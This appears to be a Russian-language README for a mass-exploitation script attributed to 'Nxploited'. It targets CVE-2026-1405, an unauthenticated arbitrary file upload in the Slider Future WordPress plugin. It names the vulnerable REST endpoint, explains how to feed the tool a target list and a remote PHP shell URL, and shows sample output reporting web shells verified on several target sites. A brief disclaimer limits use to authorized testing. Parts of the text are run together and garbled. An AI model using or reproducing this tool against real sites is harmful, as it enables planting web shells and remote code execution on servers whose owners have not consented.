
Slider Future <= 1.0.5 — Неавторизованная произвольная загрузка файлов
Slider Future <= 1.0.5 – Неаутентифицированная произвольная загрузка файлов
Компонент: Slider Future (плагин WordPress)
Затронутые версии: ≤ 1.0.5
Уязвимость: Неаутентифицированная произвольная загрузка файлов
CVE: CVE-2026-1405
Оценка CVSS: 9.8 (Критический)
Плагин Slider Future для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файла в функции slider_future_handle_image_upload во всех версиях до 1.0.5 включительно. Это позволяет неаутентифицированным злоумышленникам загружать любые типы файлов, включая вредоносные PHP-шеллы, непосредственно на атакуемый сервер, что обеспечивает удалённое выполнение кода.
/wp-json/slider-future/v1/upload-image/image_url (без аутентификации).http://example1.com
https://example2.com
...
Пример: http://yourserver.com/shell.php
python3 CVE-2026-1405.py
Вас попросят ввести:
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url, указывающий на ваш шелл.Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование против сайтов, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt